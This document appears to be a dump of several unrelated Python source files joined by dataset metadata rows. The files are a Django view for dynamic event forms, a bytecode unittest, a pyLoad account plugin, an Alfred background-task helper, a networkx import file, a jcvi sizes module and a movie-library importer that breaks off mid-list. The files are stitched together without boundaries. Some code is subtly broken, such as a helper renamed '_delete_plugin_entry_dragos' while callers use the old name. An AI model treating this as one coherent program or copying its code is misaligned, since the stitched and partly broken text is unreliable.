"""View created form.
:param django.http.HttpRequest request:
:param string form_entry_slug:
:param fobi.base.BaseTheme theme: Theme instance.
:param string template_name:
:return django.http.HttpResponse:
"""
# secrets = EmailApp.objects.filter(secret=secret)
try:
kwargs = {'slug': form_entry_slug}
# kwargs = {'emailapp': secrets}
# if not request.user.is_authenticated():
# kwargs.update({'is_public': True})
form_entry = Event._default_manager.select_related('user') \
.get(**kwargs)
except ObjectDoesNotExist as err:
raise Http404("Form entry not found.")
form_element_entries = form_entry.formelemententry_set.all()[:]
# This is where the most of the magic happens. Our form is being built
# dynamically.
form_cls = assemble_form_class(
form_entry,
form_element_entries=form_element_entries,
request=request
)
if request.method == 'POST':
form = form_cls(request.POST, request.FILES)
# Fire pre form validation callbacks
fire_form_callbacks(form_entry=form_entry,
request=request, form=form,
stage=CALLBACK_BEFORE_FORM_VALIDATION)
if form.is_valid():
# Fire form valid callbacks, before handling submitted plugin
# form data.
form = fire_form_callbacks(
form_entry=form_entry,
request=request,
form=form,
stage=CALLBACK_FORM_VALID_BEFORE_SUBMIT_PLUGIN_FORM_DATA
)
# Fire plugin processors
form = submit_plugin_form_data(
form_entry=form_entry,
# invitee=secrets,
request=request,
form=form
)
# Fire form valid callbacks
form = fire_form_callbacks(form_entry=form_entry,
request=request, form=form,
stage=CALLBACK_FORM_VALID)
# Run all handlers
handler_responses, handler_errors = run_form_handlers(
form_entry=form_entry,
# invitee=secret,
request=request,
form=form,
form_element_entries=form_element_entries
)
# Warning that not everything went ok.
if handler_errors:
for handler_error in handler_errors:
messages.warning(
request,
("Error occurred: {0}.").format(handler_error)
)
# Fire post handler callbacks
fire_form_callbacks(
form_entry=form_entry,
request=request,
form=form,
stage=CALLBACK_FORM_VALID_AFTER_FORM_HANDLERS
)
messages.info(
request,
("Form {0} was submitted successfully.").format(
form_entry.title
)
)
return redirect(
reverse('events:fobi.form_entry_submitted',
args=[form_entry.slug])
)
else:
# Fire post form validation callbacks
fire_form_callbacks(form_entry=form_entry, request=request,
form=form, stage=CALLBACK_FORM_INVALID)
else:
# Providing initial form data by feeding entire GET dictionary
# to the form, if ``GET_PARAM_INITIAL_DATA`` is present in the
# GET.
kwargs = {}
if GET_PARAM_INITIAL_DATA in request.GET:
kwargs = {'initial': request.GET}
form = form_cls(**kwargs)
# In debug mode, try to identify possible problems.
if DEBUG:
form.as_p()
else:
try:
form.as_p()
except Exception as err:
logger.error(err)
theme = get_theme(request=request, as_instance=True)
theme.collect_plugin_media(form_element_entries)
context = {
'form': form,
'form_entry': form_entry,
'fobi_theme': theme,
'fobi_form_title': form_entry.title,
}
if not template_name:
# template_name = theme.view_form_entry_template
template_name = 'events/event_detail_invitati.html'
return render(request, template_name, context)
@login_required
def delete_form_entry(request, form_entry_id, template_name=None):
"""Delete form entry.
:param django.http.HttpRequest request:
:param int form_entry_id:
:param string template_name:
:return django.http.HttpResponse:
"""
try:
obj = FormEntry._default_manager \
.get(pk=form_entry_id, user__pk=request.user.pk)
except ObjectDoesNotExist:
raise Http404("Form entry not found.")
obj.delete()
messages.info(
request,
('The form "{0}" was deleted successfully.').format(obj.name)
)
return redirect('events:fobi.dashboard')
@login_required
def add_form_element_entry(request,
form_entry_id,
form_element_plugin_uid,
theme=None,
template_name=None):
"""Add form element entry.
:param django.http.HttpRequest request:
:param int form_entry_id:
:param int form_element_plugin_uid:
:param fobi.base.BaseTheme theme: Theme instance.
:param string template_name:
:return django.http.HttpResponse:
"""
try:
form_entry = Event._default_manager \
.prefetch_related('formelemententry_set') \
.get(pk=form_entry_id)
except ObjectDoesNotExist:
raise Http404("Form entry not found.")
form_elements = form_entry.formelemententry_set.all()
user_form_element_plugin_uids = get_user_form_field_plugin_uids(
request.user
)
if form_element_plugin_uid not in user_form_element_plugin_uids:
raise Http404("Plugin does not exist or you are not allowed "
"to use this plugin!")
form_element_plugin_cls = form_element_plugin_registry.get(
form_element_plugin_uid
)
form_element_plugin = form_element_plugin_cls(user=request.user)
form_element_plugin.request = request
form_element_plugin_form_cls = form_element_plugin.get_form()
form = None
obj = FormElementEntry()
obj.form_entry = form_entry
obj.plugin_uid = form_element_plugin_uid
obj.user = request.user
save_object = False
if form_elements.count() < form_entry.collection_quota:
# If plugin doesn't have a form
if not form_element_plugin_form_cls:
save_object = True
# If POST
elif request.method == 'POST':
# If element has a form
form = form_element_plugin.get_initialised_create_form_or_404(
data=request.POST,
files=request.FILES
)
form.validate_plugin_data(form_elements, request=request)
if form.is_valid():
# Saving the plugin form data.
form.save_plugin_data(request=request)
# Getting the plugin data.
obj.plugin_data = form.get_plugin_data(request=request)
if form_elements.count() < form_entry.collection_quota:
save_object = True
else:
return HttpResponseRedirect(
reverse('events:list'))
# If not POST
else:
form = form_element_plugin.get_initialised_create_form_or_404()
else:
return HttpResponseRedirect(
reverse('events:list'))
if save_object:
# Handling the position
position = 1
records = FormElementEntry.objects.filter(form_entry=form_entry) \
.aggregate(models.Max('position'))
if records:
try:
position = records['{0}__max'.format('position')] + 1
except TypeError:
pass
obj.position = position
# Save the object.
obj.save()
messages.info(
request,
('The form element plugin "{0}" was added '
'successfully.').format(form_element_plugin.name)
)
return redirect(
# "{0}?active_tab=tab-form-elements".format(
reverse('events:fobi.edit_form_entry',
kwargs={'form_entry_id': form_entry_id})
)
# )
context = {
'form': form,
'form_entry': form_entry,
'form_element_plugin': form_element_plugin,
}
# If given, pass to the template (and override the value set by
# the context processor.
# if theme:
# context.update({'fobi_theme': theme})
if not template_name:
if not theme:
theme = get_theme(request=request, as_instance=True)
template_name = theme.add_form_element_entry_template
# else:
# template_name = 'k.html'
return render(request, template_name, context)
# else:
# return reverse_lazy('events:list')
# *****************************************************************************
# **************************** Edit form element entry ************************
# *****************************************************************************
@login_required
def edit_form_element_entry(request,
form_element_entry_id,
theme=None,
template_name=None):
"""Edit form element entry.
:param django.http.HttpRequest request:
:param int form_element_entry_id:
:param fobi.base.BaseTheme theme: Theme instance.
:param string template_name:
:return django.http.HttpResponse:
"""
try:
obj = FormElementEntry._default_manager \
.select_related('form_entry',
'form_entry__user') \
.get(pk=form_element_entry_id,
form_entry__user__pk=request.user.pk)
except ObjectDoesNotExist:
raise Http404("Form element entry not found.")
form_entry = obj.form_entry
form_element_plugin = obj.get_plugin(request=request)
form_element_plugin.request = request
FormElementPluginForm = form_element_plugin.get_form()
form = None
if not FormElementPluginForm:
messages.info(
request,
('The form element plugin "{0}" '
'is not configurable!').format(form_element_plugin.name)
)
return redirect('events:fobi.edit_form_entry', form_entry_id=form_entry.pk)
elif request.method == 'POST':
form = form_element_plugin.get_initialised_edit_form_or_404(
data=request.POST,
files=request.FILES
)
form_elements = FormElementEntry._default_manager \
.select_related('form_entry',
'form_entry__user') \
.exclude(pk=form_element_entry_id) \
.filter(form_entry=form_entry)
form.validate_plugin_data(form_elements, request=request)
if form.is_valid():
# Saving the plugin form data.
form.save_plugin_data(request=request)
# Getting the plugin data.
obj.plugin_data = form.get_plugin_data(request=request)
# Save the object.
obj.save()
messages.info(
request,
('The form element plugin "{0}" was edited '
'successfully.').format(form_element_plugin.name)
)
return redirect('events:fobi.edit_form_entry',
form_entry_id=form_entry.pk)
else:
form = form_element_plugin.get_initialised_edit_form_or_404()
form_element_plugin = obj.get_plugin(request=request)
form_element_plugin.request = request
context = {
'form': form,
'form_entry': form_entry,
'form_element_plugin': form_element_plugin,
}
print(form)
# If given, pass to the template (and override the value set by
# the context processor.
if theme:
context.update({'fobi_theme': theme})
if not template_name:
if not theme:
theme = get_theme(request=request, as_instance=True)
template_name = theme.edit_form_element_entry_template
return render(request, template_name, context)
# *****************************************************************************
# **************************** Delete form element entry **********************
# *****************************************************************************
def _delete_plugin_entry_dragos(request,
entry_id,
entry_model_cls,
get_user_plugin_uids_func,
message,
html_anchor):
"""Abstract delete entry.
:param django.http.HttpRequest request:
:param int entry_id:
:param fobi.models.AbstractPluginEntry entry_model_cls: Subclass of
``fobi.models.AbstractPluginEntry``.
:param callable get_user_plugin_uids_func:
:param str message:
:return django.http.HttpResponse:
"""
try:
obj = entry_model_cls._default_manager \
.select_related('form_entry') \
.get(pk=entry_id,
form_entry__user__pk=request.user.pk)
except ObjectDoesNotExist:
raise Http404(("{0} not found.").format(
entry_model_cls._meta.verbose_name)
)
form_entry = obj.form_entry
plugin = obj.get_plugin(request=request)
plugin.request = request
plugin._delete_plugin_data()
obj.delete()
messages.info(request, message.format(plugin.name))
redirect_url = reverse(
'events:fobi.edit_form_entry', kwargs={'form_entry_id': form_entry.pk}
)
return redirect("{0}{1}".format(redirect_url, html_anchor))
@login_required
def delete_form_element_entry(request, form_element_entry_id):
"""Delete form element entry.
:param django.http.HttpRequest request:
:param int form_element_entry_id:
:return django.http.HttpResponse:
"""
return _delete_plugin_entry(
request=request,
entry_id=form_element_entry_id,
entry_model_cls=FormElementEntry,
get_user_plugin_uids_func=get_user_form_field_plugin_uids,
message=(
'The form element plugin "{0}" was deleted successfully.'
),
html_anchor='?active_tab=tab-form-elements'
)
def form_entry_submitted(request, form_entry_slug=None, template_name=None):
"""Form entry submitted.
:param django.http.HttpRequest request:
:param string form_entry_slug:
:param string template_name:
:return django.http.HttpResponse:
"""
try:
kwargs = {'slug': form_entry_slug}
# if not request.user.is_authenticated():
# kwargs.update({'is_public': True})
form_entry = Event._default_manager \
.select_related('user') \
.get(**kwargs)
except ObjectDoesNotExist:
raise Http404("Form entry not found.")
context = {
'form_entry_slug': form_entry_slug,
'form_entry': form_entry
}
if not template_name:
theme = get_theme(request=request, as_instance=True)
template_name = theme.form_entry_submitted_template
return render(request, template_name, context)
| mit | -7,103,525,363,251,056,000 | 31.91716 | 83 | 0.562786 | false |
haypo/bytecode | bytecode/tests/test_code.py | 1 | 1482 | import unittest
from bytecode import ConcreteBytecode, Bytecode, ControlFlowGraph
from bytecode.tests import get_code
class CodeTests(unittest.TestCase):
"""Check that bytecode.from_code(code).to_code() returns code."""
def check(self, source, function=False):
ref_code = get_code(source, function=function)
code = ConcreteBytecode.from_code(ref_code).to_code()
self.assertEqual(code, ref_code)
code = Bytecode.from_code(ref_code).to_code()
self.assertEqual(code, ref_code)
bytecode = Bytecode.from_code(ref_code)
blocks = ControlFlowGraph.from_bytecode(bytecode)
code = blocks.to_bytecode().to_code()
self.assertEqual(code, ref_code)
def test_loop(self):
self.check('''
for x in range(1, 10):
x += 1
if x == 3:
continue
x -= 1
if x > 7:
break
x = 0
print(x)
''')
def test_varargs(self):
self.check('''
def func(a, b, *varargs):
pass
''', function=True)
def test_kwargs(self):
self.check('''
def func(a, b, **kwargs):
pass
''', function=True)
def test_kwonlyargs(self):
self.check('''
def func(*, arg, arg2):
pass
''', function=True)
if __name__ == "__main__":
unittest.main()
| mit | 2,037,071,801,119,486,500 | 25 | 69 | 0.516194 | false |
fzimmermann89/pyload | module/plugins/accounts/FreakshareCom.py | 1 | 1490 | # -*- coding: utf-8 -*-
import re
import time
from module.plugins.internal.Account import Account
class FreakshareCom(Account):
__name__ = "FreakshareCom"
__type__ = "account"
__version__ = "0.18"
__status__ = "testing"
__description__ = """Freakshare.com account plugin"""
__license__ = "GPLv3"
__authors__ = [("RaNaN", "[email protected]")]
def grab_info(self, user, password, data):
premium = False
validuntil = None
trafficleft = None
html = self.load("http://freakshare.com/")
try:
m = re.search(r'ltig bis:</td>\s*<td><b>([\d.:\-]+)</b></td>', html, re.M)
validuntil = time.mktime(time.strptime(m.group(1), "%d.%m.%Y - %H:%M"))
except Exception:
pass
try:
m = re.search(r'Traffic verbleibend:</td>\s*<td>([^<]+)', html, re.M)
trafficleft = self.parse_traffic(m.group(1))
except Exception:
pass
return {'premium': premium, 'validuntil': validuntil, 'trafficleft': trafficleft}
def signin(self, user, password, data):
self.load("http://freakshare.com/index.php?language=EN")
html = self.load("https://freakshare.com/login.html",
post={'submit': "Login",
'user' : user,
'pass' : password})
if ">Wrong Username or Password" in html:
self.fail_login()
| gpl-3.0 | 3,207,318,259,331,541,000 | 27.113208 | 89 | 0.518792 | false |
deanishe/alfred-workflow-dummy | src/workflow/background.py | 2 | 6171 | #!/usr/bin/env python
# encoding: utf-8
#
# Copyright © 2014 [email protected]
#
# MIT Licence. See http://opensource.org/licenses/MIT
#
# Created on 2014-04-06
#
"""
Run background tasks
"""
from __future__ import print_function, unicode_literals
import sys
import os
import subprocess
import pickle
from workflow import Workflow
__all__ = ['is_running', 'run_in_background']
wf = Workflow()
log = wf.logger
def _arg_cache(name):
"""Return path to pickle cache file for arguments
:param name: name of task
:type name: ``unicode``
:returns: Path to cache file
:rtype: ``unicode`` filepath
"""
return wf.cachefile('{}.argcache'.format(name))
def _pid_file(name):
"""Return path to PID file for ``name``
:param name: name of task
:type name: ``unicode``
:returns: Path to PID file for task
:rtype: ``unicode`` filepath
"""
return wf.cachefile('{}.pid'.format(name))
def _process_exists(pid):
"""Check if a process with PID ``pid`` exists
:param pid: PID to check
:type pid: ``int``
:returns: ``True`` if process exists, else ``False``
:rtype: ``Boolean``
"""
try:
os.kill(pid, 0)
except OSError: # not running
return False
return True
def is_running(name):
"""
Test whether task is running under ``name``
:param name: name of task
:type name: ``unicode``
:returns: ``True`` if task with name ``name`` is running, else ``False``
:rtype: ``Boolean``
"""
pidfile = _pid_file(name)
if not os.path.exists(pidfile):
return False
with open(pidfile, 'rb') as file:
pid = int(file.read().strip())
if _process_exists(pid):
return True
elif os.path.exists(pidfile):
os.unlink(pidfile)
return False
def _background(stdin='/dev/null', stdout='/dev/null',
stderr='/dev/null'): # pragma: no cover
"""Fork the current process into a background daemon.
:param stdin: where to read input
:type stdin: filepath
:param stdout: where to write stdout output
:type stdout: filepath
:param stderr: where to write stderr output
:type stderr: filepath
"""
# Do first fork.
try:
pid = os.fork()
if pid > 0:
sys.exit(0) # Exit first parent.
except OSError as e:
log.critical("fork #1 failed: (%d) %s\n" % (e.errno, e.strerror))
sys.exit(1)
# Decouple from parent environment.
os.chdir(wf.workflowdir)
os.umask(0)
os.setsid()
# Do second fork.
try:
pid = os.fork()
if pid > 0:
sys.exit(0) # Exit second parent.
except OSError as e:
log.critical("fork #2 failed: (%d) %s\n" % (e.errno, e.strerror))
sys.exit(1)
# Now I am a daemon!
# Redirect standard file descriptors.
si = file(stdin, 'r', 0)
so = file(stdout, 'a+', 0)
se = file(stderr, 'a+', 0)
if hasattr(sys.stdin, 'fileno'):
os.dup2(si.fileno(), sys.stdin.fileno())
if hasattr(sys.stdout, 'fileno'):
os.dup2(so.fileno(), sys.stdout.fileno())
if hasattr(sys.stderr, 'fileno'):
os.dup2(se.fileno(), sys.stderr.fileno())
def run_in_background(name, args, **kwargs):
"""Pickle arguments to cache file, then call this script again via
:func:`subprocess.call`.
:param name: name of task
:type name: ``unicode``
:param args: arguments passed as first argument to :func:`subprocess.call`
:param \**kwargs: keyword arguments to :func:`subprocess.call`
:returns: exit code of sub-process
:rtype: ``int``
When you call this function, it caches its arguments and then calls
``background.py`` in a subprocess. The Python subprocess will load the
cached arguments, fork into the background, and then run the command you
specified.
This function will return as soon as the ``background.py`` subprocess has
forked, returning the exit code of *that* process (i.e. not of the command
you're trying to run).
If that process fails, an error will be written to the log file.
If a process is already running under the same name, this function will
return immediately and will not run the specified command.
"""
if is_running(name):
log.info('Task `{}` is already running'.format(name))
return
argcache = _arg_cache(name)
# Cache arguments
with open(argcache, 'wb') as file:
pickle.dump({'args': args, 'kwargs': kwargs}, file)
log.debug('Command arguments cached to `{}`'.format(argcache))
# Call this script
cmd = ['/usr/bin/python', __file__, name]
log.debug('Calling {!r} ...'.format(cmd))
retcode = subprocess.call(cmd)
if retcode: # pragma: no cover
log.error('Failed to call task in background')
else:
log.debug('Executing task `{}` in background...'.format(name))
return retcode
def main(wf): # pragma: no cover
"""
Load cached arguments, fork into background, then call
:meth:`subprocess.call` with cached arguments
"""
name = wf.args[0]
argcache = _arg_cache(name)
if not os.path.exists(argcache):
log.critical('No arg cache found : {!r}'.format(argcache))
return 1
# Load cached arguments
with open(argcache, 'rb') as file:
data = pickle.load(file)
# Cached arguments
args = data['args']
kwargs = data['kwargs']
# Delete argument cache file
os.unlink(argcache)
pidfile = _pid_file(name)
# Fork to background
_background()
# Write PID to file
with open(pidfile, 'wb') as file:
file.write('{}'.format(os.getpid()))
# Run the command
try:
log.debug('Task `{}` running'.format(name))
log.debug('cmd : {!r}'.format(args))
retcode = subprocess.call(args, **kwargs)
if retcode:
log.error('Command failed with [{}] : {!r}'.format(retcode, args))
finally:
if os.path.exists(pidfile):
os.unlink(pidfile)
log.debug('Task `{}` finished'.format(name))
if __name__ == '__main__': # pragma: no cover
wf.run(main)
| mit | -6,637,798,976,903,900,000 | 24.390947 | 78 | 0.609076 | false |
ReganBell/QReview | build/lib/networkx/algorithms/centrality/__init__.py | 9 | 1239 | from networkx.algorithms.centrality.betweenness import *
from networkx.algorithms.centrality.betweenness_subset import *
from networkx.algorithms.centrality.closeness import *
from networkx.algorithms.centrality.current_flow_closeness import *
from networkx.algorithms.centrality.current_flow_betweenness import *
from networkx.algorithms.centrality.current_flow_betweenness_subset import *
from networkx.algorithms.centrality.degree_alg import *
from networkx.algorithms.centrality.dispersion import *
from networkx.algorithms.centrality.eigenvector import *
from networkx.algorithms.centrality.katz import *
from networkx.algorithms.centrality.load import *
from networkx.algorithms.centrality.communicability_alg import *
import networkx.algorithms.centrality.betweenness
import networkx.algorithms.centrality.closeness
import networkx.algorithms.centrality.current_flow_betweenness
import networkx.algorithms.centrality.current_flow_closeness
import networkx.algorithms.centrality.degree_alg
import networkx.algorithms.centrality.dispersion
import networkx.algorithms.centrality.eigenvector
import networkx.algorithms.centrality.load
import networkx.algorithms.centrality.communicability_alg
import networkx.algorithms.centrality.katz
| bsd-3-clause | -3,776,924,352,605,188,000 | 55.318182 | 76 | 0.869249 | false |
sgordon007/jcvi_062915 | formats/sizes.py | 1 | 4608 | #!/usr/bin/env python
# -*- coding: UTF-8 -*-
import os
import os.path as op
import sys
import logging
import numpy as np
from jcvi.formats.base import LineFile
from jcvi.apps.base import OptionParser, ActionDispatcher, need_update, sh, \
get_abs_path, which
class Sizes (LineFile):
"""
Two-column .sizes file, often generated by `faSize -detailed`
contigID size
"""
def __init__(self, filename, select=None):
assert op.exists(filename), "File `{0}` not found".format(filename)
# filename can be both .sizes file or FASTA formatted file
sizesname = filename
if not filename.endswith(".sizes"):
sizesname = filename + ".sizes"
filename = get_abs_path(filename)
if need_update(filename, sizesname):
cmd = "faSize"
if which(cmd):
cmd += " -detailed {0}".format(filename)
sh(cmd, outfile=sizesname)
else:
from jcvi.formats.fasta import Fasta
f = Fasta(filename)
fw = open(sizesname, "w")
for k, size in f.itersizes_ordered():
print >> fw, "\t".join((k, str(size)))
fw.close()
filename = sizesname
assert filename.endswith(".sizes")
super(Sizes, self).__init__(filename)
self.fp = open(filename)
self.filename = filename
# get sizes for individual contigs, both in list and dict
# this is to preserve the input order in the sizes file
sizes = list(self.iter_sizes())
if select:
assert select > 0
sizes = [x for x in sizes if x[1] >= select]
self.sizes_mapping = dict(sizes)
# get cumulative sizes, both in list and dict
ctgs, sizes = zip(*sizes)
self.sizes = sizes
cumsizes = np.cumsum([0] + list(sizes))
self.ctgs = ctgs
self.cumsizes = cumsizes
self.cumsizes_mapping = dict(zip(ctgs, cumsizes))
def __len__(self):
return len(self.sizes)
def get_size(self, ctg):
return self.sizes_mapping[ctg]
def get_cumsize(self, ctg):
return self.cumsizes_mapping[ctg]
def close(self, clean=False):
self.fp.close()
if clean:
os.remove(self.filename)
@property
def mapping(self):
return self.sizes_mapping
@property
def totalsize(self):
return sum(self.sizes)
def iter_sizes(self):
self.fp.seek(0)
for row in self.fp:
ctg, size = row.split()[:2]
yield ctg, int(size)
def get_position(self, ctg, pos):
if ctg not in self.cumsizes_mapping:
return None
return self.cumsizes_mapping[ctg] + pos
def get_breaks(self):
for i in xrange(len(self)):
yield self.ctgs[i], self.cumsizes[i], self.cumsizes[i + 1]
@property
def summary(self):
from jcvi.assembly.base import calculate_A50
ctgsizes = self.sizes_mapping.values()
a50, l50, n50 = calculate_A50(ctgsizes)
return sum(ctgsizes), l50, n50
def main():
actions = (
('extract', 'extract the lines containing only the given IDs'),
('agp', 'write to AGP format from sizes file'),
)
p = ActionDispatcher(actions)
p.dispatch(globals())
def extract(args):
"""
%prog extract idsfile sizesfile
Extract the lines containing only the given IDs.
"""
p = OptionParser(extract.__doc__)
opts, args = p.parse_args(args)
if len(args) != 2:
sys.exit(not p.print_help())
idsfile, sizesfile = args
sizes = Sizes(sizesfile).mapping
fp = open(idsfile)
for row in fp:
name = row.strip()
size = sizes[name]
print "\t".join(str(x) for x in (name, size))
def agp(args):
"""
%prog agp <fastafile|sizesfile>
Convert the sizes file to a trivial AGP file.
"""
from jcvi.formats.agp import OO
p = OptionParser(agp.__doc__)
opts, args = p.parse_args(args)
if len(args) != 1:
sys.exit(not p.print_help())
sizesfile, = args
sizes = Sizes(sizesfile)
agpfile = sizes.filename.rsplit(".", 1)[0] + ".agp"
fw = open(agpfile, "w")
o = OO() # Without a filename
for ctg, size in sizes.iter_sizes():
o.add(ctg, ctg, size)
o.write_AGP(fw)
fw.close()
logging.debug("AGP file written to `{0}`.".format(agpfile))
return agpfile
if __name__ == '__main__':
main()
| bsd-2-clause | -5,013,986,353,859,409,000 | 25.331429 | 77 | 0.565538 | false |
DrSleep/tensorflow-deeplab-resnet | kaffe/tensorflow/transformer.py | 3 | 10312 | import numpy as np
from ..errors import KaffeError, print_stderr
from ..graph import GraphBuilder, NodeMapper
from ..layers import NodeKind
from ..transformers import (DataInjector, DataReshaper, NodeRenamer, ReLUFuser,
BatchNormScaleBiasFuser, BatchNormPreprocessor, ParameterNamer)
from . import network
def get_padding_type(kernel_params, input_shape, output_shape):
'''Translates Caffe's numeric padding to one of ('SAME', 'VALID').
Caffe supports arbitrary padding values, while TensorFlow only
supports 'SAME' and 'VALID' modes. So, not all Caffe paddings
can be translated to TensorFlow. There are some subtleties to
how the padding edge-cases are handled. These are described here:
https://github.com/Yangqing/caffe2/blob/master/caffe2/proto/caffe2_legacy.proto
'''
k_h, k_w, s_h, s_w, p_h, p_w = kernel_params
s_o_h = np.ceil(input_shape.height / float(s_h))
s_o_w = np.ceil(input_shape.width / float(s_w))
if (output_shape.height == s_o_h) and (output_shape.width == s_o_w):
return 'SAME'
v_o_h = np.ceil((input_shape.height - k_h + 1.0) / float(s_h))
v_o_w = np.ceil((input_shape.width - k_w + 1.0) / float(s_w))
if (output_shape.height == v_o_h) and (output_shape.width == v_o_w):
return 'VALID'
return None
class TensorFlowNode(object):
'''An intermediate representation for TensorFlow operations.'''
def __init__(self, op, *args, **kwargs):
# A string corresponding to the TensorFlow operation
self.op = op
# Positional arguments for the operation
self.args = args
# Keyword arguments for the operation
self.kwargs = list(kwargs.items())
# The source Caffe node
self.node = None
def format(self, arg):
'''Returns a string representation for the given value.'''
return "'%s'" % arg if isinstance(arg, basestring) else str(arg)
def pair(self, key, value):
'''Returns key=formatted(value).'''
return '%s=%s' % (key, self.format(value))
def emit(self):
'''Emits the Python source for this node.'''
# Format positional arguments
args = map(self.format, self.args)
# Format any keyword arguments
if self.kwargs:
args += [self.pair(k, v) for k, v in self.kwargs]
# Set the node name
args.append(self.pair('name', self.node.name))
args = ', '.join(args)
return '%s(%s)' % (self.op, args)
class MaybeActivated(object):
def __init__(self, node, default=True):
self.inject_kwargs = {}
if node.metadata.get('relu', False) != default:
self.inject_kwargs['relu'] = not default
def __call__(self, *args, **kwargs):
kwargs.update(self.inject_kwargs)
return TensorFlowNode(*args, **kwargs)
class TensorFlowMapper(NodeMapper):
def get_kernel_params(self, node):
kernel_params = node.layer.kernel_parameters
input_shape = node.get_only_parent().output_shape
padding = get_padding_type(kernel_params, input_shape, node.output_shape)
# Only emit the padding if it's not the default value.
padding = {'padding': padding} if padding != network.DEFAULT_PADDING else {}
return (kernel_params, padding)
def map_convolution(self, node):
(kernel_params, kwargs) = self.get_kernel_params(node)
h = kernel_params.kernel_h
w = kernel_params.kernel_w
c_o = node.output_shape[1]
c_i = node.parents[0].output_shape[1]
group = node.parameters.group
if group != 1:
kwargs['group'] = group
if not node.parameters.bias_term:
kwargs['biased'] = False
assert kernel_params.kernel_h == h
assert kernel_params.kernel_w == w
return MaybeActivated(node)('conv', kernel_params.kernel_h, kernel_params.kernel_w, c_o,
kernel_params.stride_h, kernel_params.stride_w, **kwargs)
def map_relu(self, node):
return TensorFlowNode('relu')
def map_pooling(self, node):
pool_type = node.parameters.pool
if pool_type == 0:
pool_op = 'max_pool'
elif pool_type == 1:
pool_op = 'avg_pool'
else:
# Stochastic pooling, for instance.
raise KaffeError('Unsupported pooling type.')
(kernel_params, padding) = self.get_kernel_params(node)
return TensorFlowNode(pool_op, kernel_params.kernel_h, kernel_params.kernel_w,
kernel_params.stride_h, kernel_params.stride_w, **padding)
def map_inner_product(self, node):
#TODO: Axis
assert node.parameters.axis == 1
#TODO: Unbiased
assert node.parameters.bias_term == True
return MaybeActivated(node)('fc', node.parameters.num_output)
def map_softmax(self, node):
return TensorFlowNode('softmax')
def map_lrn(self, node):
params = node.parameters
# The window size must be an odd value. For a window
# size of (2*n+1), TensorFlow defines depth_radius = n.
assert params.local_size % 2 == 1
# Caffe scales by (alpha/(2*n+1)), whereas TensorFlow
# just scales by alpha (as does Krizhevsky's paper).
# We'll account for that here.
alpha = params.alpha / float(params.local_size)
return TensorFlowNode('lrn', int(params.local_size / 2), alpha, params.beta)
def map_concat(self, node):
axis = (2, 3, 1, 0)[node.parameters.axis]
return TensorFlowNode('concat', axis)
def map_dropout(self, node):
return TensorFlowNode('dropout', node.parameters.dropout_ratio)
def map_batch_norm(self, node):
scale_offset = len(node.data) == 4
kwargs = {'is_training': True} if scale_offset else {'is_training': True, 'scale': False}
return MaybeActivated(node, default=False)('batch_normalization', **kwargs)
def map_eltwise(self, node):
operations = {0: 'multiply', 1: 'add', 2: 'max'}
op_code = node.parameters.operation
try:
return TensorFlowNode(operations[op_code])
except KeyError:
raise KaffeError('Unknown elementwise operation: {}'.format(op_code))
def commit(self, chains):
return chains
class TensorFlowEmitter(object):
def __init__(self, tab=None):
self.tab = tab or ' ' * 4
self.prefix = ''
def indent(self):
self.prefix += self.tab
def outdent(self):
self.prefix = self.prefix[:-len(self.tab)]
def statement(self, s):
return self.prefix + s + '\n'
def emit_imports(self):
return self.statement('from kaffe.tensorflow import Network\n')
def emit_class_def(self, name):
return self.statement('class %s(Network):' % (name))
def emit_setup_def(self):
return self.statement('def setup(self):')
def emit_parents(self, chain):
assert len(chain)
s = '(self.feed('
sep = ', \n' + self.prefix + (' ' * len(s))
s += sep.join(["'%s'" % parent.name for parent in chain[0].node.parents])
return self.statement(s + ')')
def emit_node(self, node):
return self.statement(' ' * 5 + '.' + node.emit())
def emit(self, name, chains):
s = self.emit_imports()
s += self.emit_class_def(name)
self.indent()
s += self.emit_setup_def()
self.indent()
blocks = []
for chain in chains:
b = ''
b += self.emit_parents(chain)
for node in chain:
b += self.emit_node(node)
blocks.append(b[:-1] + ')')
s = s + '\n\n'.join(blocks)
return s
class TensorFlowTransformer(object):
def __init__(self, def_path, data_path, verbose=True, phase='test'):
self.verbose = verbose
self.phase = phase
self.load(def_path, data_path, phase)
self.params = None
self.source = None
def load(self, def_path, data_path, phase):
# Build the graph
graph = GraphBuilder(def_path, phase).build()
if data_path is not None:
# Load and associate learned parameters
graph = DataInjector(def_path, data_path)(graph)
# Transform the graph
transformers = [
# Fuse split batch normalization layers
BatchNormScaleBiasFuser(),
# Fuse ReLUs
# TODO: Move non-linearity application to layer wrapper, allowing
# any arbitrary operation to be optionally activated.
ReLUFuser(allowed_parent_types=[NodeKind.Convolution, NodeKind.InnerProduct,
NodeKind.BatchNorm]),
# Rename nodes
# Slashes are used for scoping in TensorFlow. Replace slashes
# in node names with underscores.
# (Caffe's GoogLeNet implementation uses slashes)
NodeRenamer(lambda node: node.name.replace('/', '_'))
]
self.graph = graph.transformed(transformers)
# Display the graph
if self.verbose:
print_stderr(self.graph)
def transform_data(self):
if self.params is None:
transformers = [
# Reshape the parameters to TensorFlow's ordering
DataReshaper({
# (c_o, c_i, h, w) -> (h, w, c_i, c_o)
NodeKind.Convolution: (2, 3, 1, 0),
# (c_o, c_i) -> (c_i, c_o)
NodeKind.InnerProduct: (1, 0)
}),
# Pre-process batch normalization data
BatchNormPreprocessor(),
# Convert parameters to dictionaries
ParameterNamer(),
]
self.graph = self.graph.transformed(transformers)
self.params = {node.name: node.data for node in self.graph.nodes if node.data}
return self.params
def transform_source(self):
if self.source is None:
mapper = TensorFlowMapper(self.graph)
chains = mapper.map()
emitter = TensorFlowEmitter()
self.source = emitter.emit(self.graph.name, chains)
return self.source
| mit | -476,553,708,143,358,400 | 35.182456 | 97 | 0.589701 | false |
MinhalSyed/MovieLibrary | LibraryImporter.py | 1 | 4145 | '''You need python3 installed on your computer to run this program.'''
import re
from os import listdir, walk
from os.path import isfile, join
from tkinter.filedialog import askdirectory, asksaveasfilename
#path = "./Movies/"
path = askdirectory(title="Please select a movie directory")
outputpath = asksaveasfilename(defaultextension='.txt', title ="Please select where you want to save your file")
onlyfiles = []
for (dirpath, dirnames, filenames) in walk(path):
for fname in filenames:
if (bool(re.match("(.*)(mkv|iso|mp4|m2ts|avi)$", fname, re.I))):
onlyfiles.append(fname)
#onlyfiles = [ f for f in listdir(path) if (isfile(join(path,f)) and (bool(re.match("(.*)(mkv|iso|mp4|m2ts|avi)$", f, re.I))))]
#print(onlyfiles)
#oneLine = '\n'.join(onlyfiles) + '\n';
# sampleList = ["The.Newsroom.2012.S02E06.720p.HDTV.x264-KILLERS.mkv",
# "SonOFBatman.2014.iso",
